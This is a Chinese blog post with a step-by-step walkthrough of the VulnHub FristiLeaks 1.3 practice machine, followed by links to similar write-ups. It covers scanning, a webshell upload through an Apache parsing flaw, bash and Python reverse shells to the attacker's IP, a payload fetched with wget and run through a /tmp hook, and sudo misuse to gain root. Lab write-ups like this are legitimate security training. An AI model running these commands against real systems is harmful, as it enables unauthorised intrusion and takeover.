vulnhub靶机:Fristileaks 详细过程

于 2024-09-18 19:39:08 发布
阅读量87 收藏 1
点赞数 2
分类专栏: Vulnhub靶机 文章标签: web安全 网络安全 经验分享 笔记 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68416970/article/details/142341725
版权

下载

下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/

修改网卡

网卡设置为nat模式,并修改mac地址为

08:00:27:A5:A6:76

信息收集

主机发现

arp-scan -l

发现靶机 IP 是 192.168.109.178

端口扫描

nmap -p- -A 192.168.109.178

目录扫描

python3 dirsearch.py -u "192.168.109.178" -x 403

访问 web

访问靶机 192.168.109.178

访问 /robots.txt

发现有三个路径,分别拼接访问一下

访问之后发现 3 个路径都是这张图

通过首页这里,发现有个小提示,拼接访问一下

发现了登录框

SQL注入和密码爆破都没发现,右击检查页面源代码,发现图片是 base64 加密的

对其进行解码

发现了有 png 字样,将其输出为 png 试试看

可能是密码,回到页面源码,盲猜一波这里的 eezeepz 是用户名,登录试试看

登录发现成功了

eezeepz
keKkeKKeKKeKkEKKEK

get shell

上传一句话木马,失败

它的中间件是apache

利用apache的解析漏洞,去绕过。在Apache1.x/2.x版本中,Apache默认一个文件可以有多个以点分割的后缀,解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。直到识别到合法后缀才进行解析。如 1.php.png

去上传路径

fristi/uploads/1.php.jpg

发现上传成功了,去蚁剑连接

反弹shell,先用kali监听4444端口

nc -lvvp 4444

蚁剑打开虚拟终端 输入

bash -c 'bash -i >& /dev/tcp/192.168.109.139/4444 0>&1'

反弹成功

权限提升

sudo -l 发现没有权限

在家目录下发现有三个用户

在 eezeepz 家目录下找到 notes.txt

发现可以在 /tmp 目录下放一个文件名为runthis的脚本文件,反弹shell
shell.py 文件内容:

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.109.139",8888));
os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

开启 http 服务

python3 -m http.server 8001

远程下载(在 /tmp 目录下载才会成功)

wget http://192.168.109.139:8001/shell.py

开启监听端口

nc -lvvp 8888

运行下面命令

echo "/usr/bin/python /tmp/shell.py" > /tmp/runthis

稍等片刻,反弹成功

获得交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在家目录翻到了两个txt和两个py文件

查看之后发现是两个 txt 是编码后的结果,1 个是编码脚本

修改他的编码脚本改为解码脚本

import base64,codecs,sys
 
def decodeString(str):
  rot13string = codecs.decode(str[::-1], 'rot13')
  return base64.b64decode(rot13string)
 
print(decodeString(sys.argv[1]))

然后对其进行解码

第二个疑似密码,尝试登录

su fristigod
LetThereBeFristi!

登录成功

sudo -l查看具有sudo权限的程序

以fristigod的权限运行一下

 sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

说是后面要加命令

跟个id试试

 sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id

发现是root权限

跟/bin/bash获取root的shell

 sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

提权成功

燕雀安知鸿鹄之志哉.
关注
专栏目录
vulnhub】---FristiLeaks_1.3靶机
qq_43168364的博客
08-22 991
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机FristiLeaks: 1.3靶机(192.168.15.155) 攻击机:kali Linux(192.168.15.129) 相关设置 根据官网的提示这里需要给靶机设置MAC地址 设置好了之后就可以开心的玩耍了。 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r
vulnhub靶机渗透 FRISTILEAKS: 1.3
RestoreJustice的博客
03-18 258
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。冷静(fristi),这张图片就是首页的我们第二次看到再结合到上一张图片的提示,这张很有可能有提示。根据官网提供的说明,首先要将要求设置VMware虚拟机的MAC地址 08:00:27:A5:A6:76,然后开启VM。在图片中插入phpinfo和一句话木马,成功上传到 /uploads目录,根据前面的目录爆破可知上传路径。
Vulnhub靶机FristiLeaks_1.3
qq_48904485的博客
03-19 1036
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机FristiLeaks 1.3(10.0.2.12)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/注意安装靶机的时候需要将靶机的MAC地址改为:08:00:27:A5:A6:76,否则靶机ip地址会获取不到。
vulnhub系列:Fristileaks 1.3
jq_j37的博客
07-31 525
vulnhub系列:Fristileaks 1.3靶机,打靶文章
Vulnhub靶机渗透:FRISTILEAKS: 1.3
Mysmycbx的博客
05-27 2106
信息收集很难,需要总结
靶机FristiLeaks_1.3
AzVoidSUN的博客
05-10 883
下载连接 https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent https://download.vulnhub.com/fristilea ks/FristiLeaks_1.3.ova 运行环境 Virtualbox (二选一) Vnware Workstation player VMware用户将需要手动将VM...
Vulnhub靶场-FRISTILEAKS: 1.3
2302_78903258的博客
08-08 870
将上述base64编码保存到一个1.txt文件,随后在kali上进行base64解密,显示一个png。直接回显出一个登录框的界面,先尝试下amdin/admin弱口令登录,尝试失败,点击查看源代码看看。本来是想上传图片马的,但是看了看别人上传的文件,可以直接上传文件后获得webshell。紧接着访问/cgi-bin文件,显示禁止的页面,没有权限进入此目录。访问一下/robots.txt的三个目录文件,都是一张图片,显示t。扫描存在上述文件,我们一一进行访问,看能不能得到有用信息。
Vulnhub-靶机-FristiLeaks 1.3
qq_43264813的博客
03-01 463
Vulnhub靶机FristiLeaks 1.3 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub靶机FristiLeaks 1.3一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址,对目标靶机进行全端口扫描: 【命令】nmap -n -p- 192.168
Vulnhub靶机 Fristileaks
菜浪马废的博客
04-16 256
按照作者提示要求设置虚拟机的MAC地址 08:00:27:A5:A6:76 啥也没发现 源码里有两个字符串 解码第一个 第二个 给了用户名,猜测这是密码 登录一下 upload file 又是文件上传 wevely连接shell /home/eezeepz里的notes.txt文件有提示 进入/home/admin fristigod的密码 登录一下 ...
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2509
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1917
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4244
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3662
前言 这次练习的靶机vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
Vulnhub靶机:DC-1渗透详细过程
IerkeU的博客
01-27 2791
这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
09-14 3008
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全 L1 Introduction to Security
weixin_74400487的博客
09-12 781
Then he/she may be able to decrypt passwords offline using brute force (thereby bypassing methods to prevent on-line password cracking).暴力破解是一种尝试所有可能的密码组合,直到找到正确密码的方法。由于这种破解尝试是在攻击者的系统上进行的,而不是直接针对目标系统,因此它可以绕过目标系统上可能存在的防止在线密码破解的措施,如账户锁定策略或登录尝试限制。
网络安全实训八(y0usef靶机渗透实例)
Wrop的博客
09-12 483
y0usef靶机渗透实例
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
09-14 1122
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值